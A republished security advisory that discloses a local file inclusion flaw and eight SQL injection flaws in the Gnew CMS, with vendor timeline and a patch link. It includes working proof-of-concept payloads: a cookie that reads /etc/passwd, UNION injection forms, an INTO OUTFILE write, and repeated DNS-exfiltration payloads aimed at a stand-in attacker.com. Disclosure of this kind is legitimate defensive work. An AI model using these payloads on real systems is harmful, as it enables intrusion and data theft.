Lucene search

K
securityvulnsSecurityvulnsSECURITYVULNS:DOC:29857
HistoryOct 02, 2013 - 12:00 a.m.

Multiple Vulnerabilities in Gnew

2013-10-0200:00:00
vulners.com
47

Advisory ID: HTB23171
Product: Gnew
Vendor: Raoul Proenca
Vulnerable Version(s): 2013.1 and probably prior
Tested Version: 2013.1
Advisory Publication: August 28, 2013 [without technical details]
Vendor Notification: August 28, 2013
Public Disclosure: October 2, 2013
Vulnerability Type: PHP File Inclusion [CWE-98], SQL Injection [CWE-89]
CVE References: CVE-2013-5639, CVE-2013-5640
Risk Level: High
CVSSv2 Base Scores: 7.6 (AV:N/AC:H/Au:N/C:C/I:C/A:C), 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P)
Solution Status: Solution Available
Discovered and Provided: High-Tech Bridge Security Research Lab ( https://www.htbridge.com/advisory/ )


Advisory Details:

High-Tech Bridge Security Research Lab discovered multiple vulnerabilities in Gnew, which can be exploited to execute arbitrary PHP code and pefrom SQL injection attacks against vulnerable application.

1) PHP File Inclusion in Gnew: CVE-2013-5639

Vulnerability exists due to insufficient validation of user-supplied input passed via the "gnew_language" cookie to "/users/login.php" script before using it in "include()" function. A remote attacker can include and execute arbitrary local files on a vulnerable system via directory traversal sequence and URL-encoded NULL byte.

The following exploitation example below displays content of the "/etc/passwd" file:

GET /users/login.php HTTP/1.1
Cookie: gnew_language=…/…/…/etc/passwd%00;

2) SQL Injection in Gnew: CVE-2013-5640

2.1 The vulnerability exists due to insufficient filtration of "friend_email" HTTP POST parameter passed to "/news/send.php" script. A remote unauthenticated attacker can execute arbitrary SQL commands in application's database.

The following exploitation example sends MySQL server version and database username to email address "[email protected]":

<form action="http://[host]/news/send.php" method="post" name="main">
<input type="hidden" name="send" value="1">
<input type="hidden" name="user_name" value="username">
<input type="hidden" name="user_email" value="[email protected]">
<input type="hidden" name="friend_email" value="[email protected]">
<input type="hidden" name="news_id" value="-1' UNION SELECT version(),user() – ">
<input type="submit" id="btn">
</form>

2.2 The vulnerability exists due to insufficient filtration of "user_email" HTTP POST parameter passed to "/users/register.php" script. A remote unauthenticated attacker can execute arbitrary SQL commands in application's database.

The exploitation example below outputs database username and MySQL server version into file "/var/www/file.txt". Successful exploitation requires that MySQL server has write access to the "/var/www" directory.

<form action="http://[host]/users/register.php" method="post" name="main">
<input type="hidden" name="register" value="1">
<input type="hidden" name="user_email" value="' UNION SELECT user(),version() INTO OUTFILE '/var/www/file.txt' – 2">
<input type="submit" id="btn">
</form>

2.3 The vulnerability exists due to insufficient filtration of "answer_id" HTTP POST parameter passed to "/polls/vote.php" script. A remote authenticated attacker can execute arbitrary SQL commands in application's database.

The PoC code below is based on DNS Exfiltration technique and may be used if the database of the vulnerable application is hosted on a Windows system. The PoC will send a DNS request demanding IP addess for `version()` (or any other sensetive output from the database) subdomain of ".attacker.com" (a domain name, DNS server of which is controlled by the attacker):

<form action="http://[host]/polls/vote.php" method="post" name="main">
<input type="hidden" name="add_vote" value="1">
<input type="hidden" name="answer_id" value="' AND 1=(select load_file(CONCAT(CHAR(92),CHAR(92),(select version()),CHAR(46),CHAR(97),CHAR(116),CHAR(116),CHAR(97),CHAR(99),CHAR(107),CHAR(101),CHAR(114),CHAR(46),CHAR(99),CHAR(111),CHAR(109),CHAR(92),CHAR(102),CHAR(111),CHAR(111),CHAR(98),CHAR(97),CHAR(114)))) – ">
<input type="hidden" name="question_id" value="1">
<input type="submit" id="btn">
</form>

2.4 The vulnerability exists due to insufficient filtration of "question_id" HTTP POST parameter passed to "/polls/vote.php" script. A remote authenticated attacker can execute arbitrary SQL commands in application's database.

The PoC code below is based on DNS Exfiltration technique and may be used if the database of the vulnerable application is hosted on a Windows system. The PoC will send a DNS request demanding IP addess for `version()` (or any other sensetive output from the database) subdomain of ".attacker.com" (a domain name, DNS server of which is controlled by the attacker):

<form action="http://[host]/polls/vote.php" method="post" name="main">
<input type="hidden" name="add_vote" value="1">
<input type="hidden" name="answer_id" value="1">
<input type="hidden" name="question_id" value="' AND 1=(select load_file(CONCAT(CHAR(92),CHAR(92),(select version()),CHAR(46),CHAR(97),CHAR(116),CHAR(116),CHAR(97),CHAR(99),CHAR(107),CHAR(101),CHAR(114),CHAR(46),CHAR(99),CHAR(111),CHAR(109),CHAR(92),CHAR(102),CHAR(111),CHAR(111),CHAR(98),CHAR(97),CHAR(114)))) – ">
<input type="submit" id="btn">
</form>

2.5 The vulnerability exists due to insufficient filtration of "story_id" HTTP POST parameter passed to "/comments/add.php" script. A remote authenticated attacker can execute arbitrary SQL commands in application's database.

The PoC code below is based on DNS Exfiltration technique and may be used if the database of the vulnerable application is hosted on a Windows system. The PoC will send a DNS request demanding IP addess for `version()` (or any other sensetive output from the database) subdomain of ".attacker.com" (a domain name, DNS server of which is controlled by the attacker):

<form action="http://[host]/comments/add.php" method="post" name="main">
<input type="hidden" name="add" value="1">
<input type="hidden" name="preview" value="1">
<input type="hidden" name="comment_subject" value="1">
<input type="hidden" name="comment_text" value="1">
<input type="hidden" name="story_id" value="' AND 1=(select load_file(CONCAT(CHAR(92),CHAR(92),(select version()),CHAR(46),CHAR(97),CHAR(116),CHAR(116),CHAR(97),CHAR(99),CHAR(107),CHAR(101),CHAR(114),CHAR(46),CHAR(99),CHAR(111),CHAR(109),CHAR(92),CHAR(102),CHAR(111),CHAR(111),CHAR(98),CHAR(97),CHAR(114)))) – ">
<input type="submit" id="btn">
</form>

2.6 The vulnerability exists due to insufficient filtration of "story_id" HTTP POST parameter passed to "/comments/edit.php" script. A remote authenticated attacker can execute arbitrary SQL commands in application's database.

The PoC code below is based on DNS Exfiltration technique and may be used if the database of the vulnerable application is hosted on a Windows system. The PoC will send a DNS request demanding IP addess for `version()` (or any other sensetive output from the database) subdomain of ".attacker.com" (a domain name, DNS server of which is controlled by the attacker):

<form action="http://[host]/comments/edit.php" method="post" name="main">
<input type="hidden" name="edit" value="1">
<input type="hidden" name="preview_edited" value="1">
<input type="hidden" name="comment_subject" value="1">
<input type="hidden" name="comment_text" value="1">
<input type="hidden" name="story_id" value="' AND 1=(select load_file(CONCAT(CHAR(92),CHAR(92),(select version()),CHAR(46),CHAR(97),CHAR(116),CHAR(116),CHAR(97),CHAR(99),CHAR(107),CHAR(101),CHAR(114),CHAR(46),CHAR(99),CHAR(111),CHAR(109),CHAR(92),CHAR(102),CHAR(111),CHAR(111),CHAR(98),CHAR(97),CHAR(114)))) – ">
<input type="submit" id="btn">
</form>

2.7 The vulnerability exists due to insufficient filtration of "thread_id" HTTP POST parameter passed to "/posts/add.php" script. A remote authenticated attacker can execute arbitrary SQL commands in application's database.

The PoC code below is based on DNS Exfiltration technique and may be used if the database of the vulnerable application is hosted on a Windows system. The PoC will send a DNS request demanding IP addess for `version()` (or any other sensetive output from the database) subdomain of ".attacker.com" (a domain name, DNS server of which is controlled by the attacker):

<form action="http://[host]/posts/add.php" method="post" name="main">
<input type="hidden" name="add" value="1">
<input type="hidden" name="preview" value="1">
<input type="hidden" name="thread_id" value="' AND 1=(select load_file(CONCAT(CHAR(92),CHAR(92),(select version()),CHAR(46),CHAR(97),CHAR(116),CHAR(116),CHAR(97),CHAR(99),CHAR(107),CHAR(101),CHAR(114),CHAR(46),CHAR(99),CHAR(111),CHAR(109),CHAR(92),CHAR(102),CHAR(111),CHAR(111),CHAR(98),CHAR(97),CHAR(114)))) – ">
<input type="submit" id="btn">
</form>

2.8 The vulnerability exists due to insufficient filtration of "thread_id" HTTP POST parameter passed to "/posts/edit.php" script. A remote authenticated attacker can execute arbitrary SQL commands in application's database.

The PoC code below is based on DNS Exfiltration technique and may be used if the database of the vulnerable application is hosted on a Windows system. The PoC will send a DNS request demanding IP addess for `version()` (or any other sensetive output from the database) subdomain of ".attacker.com" (a domain name, DNS server of which is controlled by the attacker):

<form action="http://[host]/posts/edit.php" method="post" name="main">
<input type="hidden" name="edit" value="1">
<input type="hidden" name="preview_edited" value="1">
<input type="hidden" name="thread_id" value="' AND 1=(select load_file(CONCAT(CHAR(92),CHAR(92),(select version()),CHAR(46),CHAR(97),CHAR(116),CHAR(116),CHAR(97),CHAR(99),CHAR(107),CHAR(101),CHAR(114),CHAR(46),CHAR(99),CHAR(111),CHAR(109),CHAR(92),CHAR(102),CHAR(111),CHAR(111),CHAR(98),CHAR(97),CHAR(114)))) – ">
<input type="submit" id="btn">
</form>

Successful exploitation of vulnerabilities 2.3-2.8 requires that attacker is registered and logged-in. Registration is opened by default.

Vulnerabilities 2.1, 2.2 and 2.8 were discovered by Gjoko Krstic: http://packetstormsecurity.com/files/122771 on July 23, 2013. High-Tech Bridge Research Lab has discovered these vulnerabilities independently and publishes them as since the Vendor notification date they remain unpatched.


Solution:

Vendor did not reply to 6 notifications by email. Currently we are not aware of any official solution for these vulnerabilities.

Unofficial patch was developed by High-Tech Bridge Security Research Lab and is available here: https://www.htbridge.com/advisory/HTB23171-patch.zip


References:

[1] High-Tech Bridge Advisory HTB23171 - https://www.htbridge.com/advisory/HTB23171 - Multiple vulnerabilities in Gnew.
[2] Gnew - http://www.gnew.fr - Gnew is a simple and open-source Content Management System.
[3] Common Vulnerabilities and Exposures (CVE) - http://cve.mitre.org/ - international in scope and free for public use, CVE® is a dictionary of publicly known information security vulnerabilities and exposures.
[4] Common Weakness Enumeration (CWE) - http://cwe.mitre.org - targeted to developers and security practitioners, CWE is a formal list of software weakness types.
[5] ImmuniWeb® - http://www.htbridge.com/immuniweb/ - is High-Tech Bridge's proprietary web application security assessment solution with SaaS delivery model that combines manual and automated vulnerability testing.


Disclaimer: The information provided in this Advisory is provided "as is" and without any warranty of any kind. Details of this Advisory may be updated in order to provide as accurate information as possible. The latest version of the Advisory is available on web page [1] in the References.